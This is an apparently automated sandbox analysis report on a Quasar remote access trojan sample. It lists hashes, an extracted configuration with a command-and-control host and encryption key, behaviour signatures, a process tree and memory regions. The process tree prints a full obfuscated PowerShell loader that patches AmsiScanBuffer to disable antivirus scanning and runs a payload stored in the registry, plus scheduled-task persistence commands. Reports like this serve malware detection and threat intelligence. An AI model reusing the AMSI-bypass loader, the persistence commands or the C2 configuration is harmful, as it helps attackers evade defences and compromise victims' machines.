Analysis

  • max time kernel
    1800s
  • max time network
    1800s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02-05-2024 20:59

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 59 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1008
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{5ac13534-00e5-44a7-a2e9-afc65ce897ba}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:424
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:640
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:736
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:908
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:64
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                1⤵
                  PID:696
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                  1⤵
                    PID:808
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                      PID:1036
                      • c:\windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3288
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zXZylsadbbmq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZZIlDNgnZZHDlk,[Parameter(Position=1)][Type]$AyEbWtMyUR)$EmywbfXTqHW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+'e'+''+[Char](99)+'t'+[Char](101)+'d'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'ga'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+'as'+'s'+','+'P'+'ub'+'l'+''+'i'+''+[Char](99)+',S'+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+','+[Char](65)+''+[Char](110)+'si'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+'C'+'l'+'a'+''+[Char](115)+'s',[MulticastDelegate]);$EmywbfXTqHW.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'de'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'Pub'+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$ZZIlDNgnZZHDlk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+'Ma'+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');$EmywbfXTqHW.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bl'+'i'+''+[Char](99)+''+','+'H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+'yS'+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+'t'+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$AyEbWtMyUR,$ZZIlDNgnZZHDlk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'me'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $EmywbfXTqHW.CreateType();}$WURZPdPeawSmT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+''+'f'+''+'t'+''+[Char](46)+''+'W'+'i'+[Char](110)+''+'3'+''+[Char](50)+'.U'+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+'i'+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$jCWWdcoRrQhIrr=$WURZPdPeawSmT.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'dd'+[Char](114)+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+'lic'+','+'S'+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$uypHzBWflXXwTCdFbcM=zXZylsadbbmq @([String])([IntPtr]);$yeKOHlMfQEEFWappgvbQCt=zXZylsadbbmq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NqxAVtfewuW=$WURZPdPeawSmT.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+'e'+'H'+''+'a'+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+'r'+[Char](110)+'el3'+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$vEMHbCVTaXGqAf=$jCWWdcoRrQhIrr.Invoke($Null,@([Object]$NqxAVtfewuW,[Object](''+'L'+''+[Char](111)+'a'+[Char](100)+''+'L'+''+[Char](105)+'br'+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$KgFcoRZPtvigXKYLq=$jCWWdcoRrQhIrr.Invoke($Null,@([Object]$NqxAVtfewuW,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+'alP'+'r'+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$bSvMAUT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vEMHbCVTaXGqAf,$uypHzBWflXXwTCdFbcM).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+'.'+[Char](100)+'ll');$RGyBrvuMvUsllCDom=$jCWWdcoRrQhIrr.Invoke($Null,@([Object]$bSvMAUT,[Object](''+'A'+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+'n'+'B'+'u'+[Char](102)+''+'f'+'e'+[Char](114)+'')));$balgjGaCpe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KgFcoRZPtvigXKYLq,$yeKOHlMfQEEFWappgvbQCt).Invoke($RGyBrvuMvUsllCDom,[uint32]8,4,[ref]$balgjGaCpe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RGyBrvuMvUsllCDom,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KgFcoRZPtvigXKYLq,$yeKOHlMfQEEFWappgvbQCt).Invoke($RGyBrvuMvUsllCDom,[uint32]8,0x20,[ref]$balgjGaCpe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1760
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1092
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservice -s nsi
                        1⤵
                          PID:1192
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                          1⤵
                            PID:1228
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                            1⤵
                              PID:1240
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservice -s EventSystem
                              1⤵
                                PID:1248
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                1⤵
                                  PID:1388
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                  1⤵
                                    PID:1456
                                    • c:\windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:3192
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                      1⤵
                                        PID:1464
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                        1⤵
                                          PID:1548
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                          1⤵
                                            PID:1560
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                            1⤵
                                              PID:1596
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                              1⤵
                                                PID:1688
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                1⤵
                                                  PID:1744
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                  1⤵
                                                    PID:1788
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1800
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                      1⤵
                                                        PID:1876
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                        1⤵
                                                          PID:1888
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1968
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                            1⤵
                                                              PID:1344
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                              1⤵
                                                                PID:2140
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                1⤵
                                                                  PID:2352
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                  1⤵
                                                                    PID:2360
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2372
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                    1⤵
                                                                      PID:2400
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2608
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2668
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                        1⤵
                                                                          PID:2688
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                          1⤵
                                                                            PID:2712
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                            1⤵
                                                                              PID:2768
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:2848
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:3208
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                  1⤵
                                                                                    PID:3328
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3472
                                                                                    • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:516
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4072
                                                                                      • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3264
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                          4⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:1396
                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:3456
                                                                                      • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                        "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:3696
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3972
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:4192
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                        1⤵
                                                                                          PID:5004
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                          1⤵
                                                                                            PID:4816
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                            1⤵
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:3508
                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:3420
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                            1⤵
                                                                                              PID:4204
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:4708
                                                                                              • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:2092
                                                                                                • C:\Windows\System32\InstallAgent.exe
                                                                                                  C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4900
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                    1⤵
                                                                                                      PID:428
                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      1⤵
                                                                                                        PID:2740

                                                                                                      Network

                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                        Filesize

                                                                                                        162KB

                                                                                                        MD5

                                                                                                        152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                        SHA1

                                                                                                        c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                        SHA256

                                                                                                        a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                        SHA512

                                                                                                        2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                      • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                        Filesize

                                                                                                        409KB

                                                                                                        MD5

                                                                                                        a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                        SHA1

                                                                                                        3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                        SHA256

                                                                                                        43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                        SHA512

                                                                                                        458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                      • C:\Windows\Temp\__PSScriptPolicyTest_i5yeu3wp.1jc.ps1
                                                                                                        Filesize

                                                                                                        1B

                                                                                                        MD5

                                                                                                        c4ca4238a0b923820dcc509a6f75849b

                                                                                                        SHA1

                                                                                                        356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                        SHA256

                                                                                                        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                        SHA512

                                                                                                        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                      • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
                                                                                                        Filesize

                                                                                                        412B

                                                                                                        MD5

                                                                                                        b3365cfdbddc55ceee42dbb8ec5ac7b7

                                                                                                        SHA1

                                                                                                        543b515a6bdcd987e610a76e90454642c111b3c0

                                                                                                        SHA256

                                                                                                        addd59341ad6cb5697b8c277a98e1a3eb3899c2a0013a960615b79aa63d904ae

                                                                                                        SHA512

                                                                                                        4d7fc668c96f9351304ff46f22a6e6def0a42a66d73a7fe0571d6fe749db25962861855ed2ed8bf14ea2895f8b22c0e0f8f713235f0a5a884090ef50826b5e54

                                                                                                      • memory/424-61-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/424-60-0x00007FF8025C0000-0x00007FF80266E000-memory.dmp
                                                                                                        Filesize

                                                                                                        696KB

                                                                                                      • memory/424-59-0x00007FF805060000-0x00007FF80523B000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.9MB

                                                                                                      • memory/424-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/424-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/424-52-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/424-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/424-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/516-21-0x0000000073820000-0x0000000073F0E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/516-7-0x0000000006060000-0x000000000609E000-memory.dmp
                                                                                                        Filesize

                                                                                                        248KB

                                                                                                      • memory/516-1-0x0000000000740000-0x00000000007AC000-memory.dmp
                                                                                                        Filesize

                                                                                                        432KB

                                                                                                      • memory/516-0-0x000000007382E000-0x000000007382F000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/516-2-0x00000000055D0000-0x0000000005ACE000-memory.dmp
                                                                                                        Filesize

                                                                                                        5.0MB

                                                                                                      • memory/516-3-0x0000000005020000-0x00000000050B2000-memory.dmp
                                                                                                        Filesize

                                                                                                        584KB

                                                                                                      • memory/516-4-0x0000000073820000-0x0000000073F0E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/516-5-0x00000000050D0000-0x0000000005136000-memory.dmp
                                                                                                        Filesize

                                                                                                        408KB

                                                                                                      • memory/516-6-0x0000000005570000-0x0000000005582000-memory.dmp
                                                                                                        Filesize

                                                                                                        72KB

                                                                                                      • memory/584-73-0x00007FFFBC520000-0x00007FFFBC530000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/584-65-0x00000239D2940000-0x00000239D296B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/584-74-0x00007FF7C50F0000-0x00007FF7C5100000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/584-72-0x00000239D2940000-0x00000239D296B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/584-66-0x00000239D2940000-0x00000239D296B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/584-64-0x00000239D2910000-0x00000239D2935000-memory.dmp
                                                                                                        Filesize

                                                                                                        148KB

                                                                                                      • memory/640-84-0x000002454A440000-0x000002454A46B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/640-86-0x00007FF7C50F0000-0x00007FF7C5100000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/640-78-0x000002454A440000-0x000002454A46B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/640-85-0x00007FFFBC520000-0x00007FFFBC530000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/736-98-0x00007FF7C50F0000-0x00007FF7C5100000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/736-97-0x00007FFFBC520000-0x00007FFFBC530000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/736-90-0x00000267CCB00000-0x00000267CCB2B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/736-96-0x00000267CCB00000-0x00000267CCB2B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/908-108-0x0000017B0E230000-0x0000017B0E25B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/908-109-0x00007FFFBC520000-0x00007FFFBC530000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/908-110-0x00007FF7C50F0000-0x00007FF7C5100000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/908-102-0x0000017B0E230000-0x0000017B0E25B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/1008-114-0x0000020890400000-0x000002089042B000-memory.dmp
                                                                                                        Filesize

                                                                                                        172KB

                                                                                                      • memory/1760-48-0x00007FF805060000-0x00007FF80523B000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.9MB

                                                                                                      • memory/1760-47-0x0000029024DE0000-0x0000029024E0A000-memory.dmp
                                                                                                        Filesize

                                                                                                        168KB

                                                                                                      • memory/1760-49-0x00007FF8025C0000-0x00007FF80266E000-memory.dmp
                                                                                                        Filesize

                                                                                                        696KB

                                                                                                      • memory/1760-29-0x0000029024C60000-0x0000029024CD6000-memory.dmp
                                                                                                        Filesize

                                                                                                        472KB

                                                                                                      • memory/1760-26-0x000002900C5F0000-0x000002900C612000-memory.dmp
                                                                                                        Filesize

                                                                                                        136KB

                                                                                                      • memory/3264-15-0x0000000006A60000-0x0000000006A6A000-memory.dmp
                                                                                                        Filesize

                                                                                                        40KB

                                                                                                      • memory/3264-14-0x0000000073820000-0x0000000073F0E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/3264-13-0x0000000073820000-0x0000000073F0E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/3264-724-0x0000000073820000-0x0000000073F0E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/3264-725-0x0000000073820000-0x0000000073F0E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB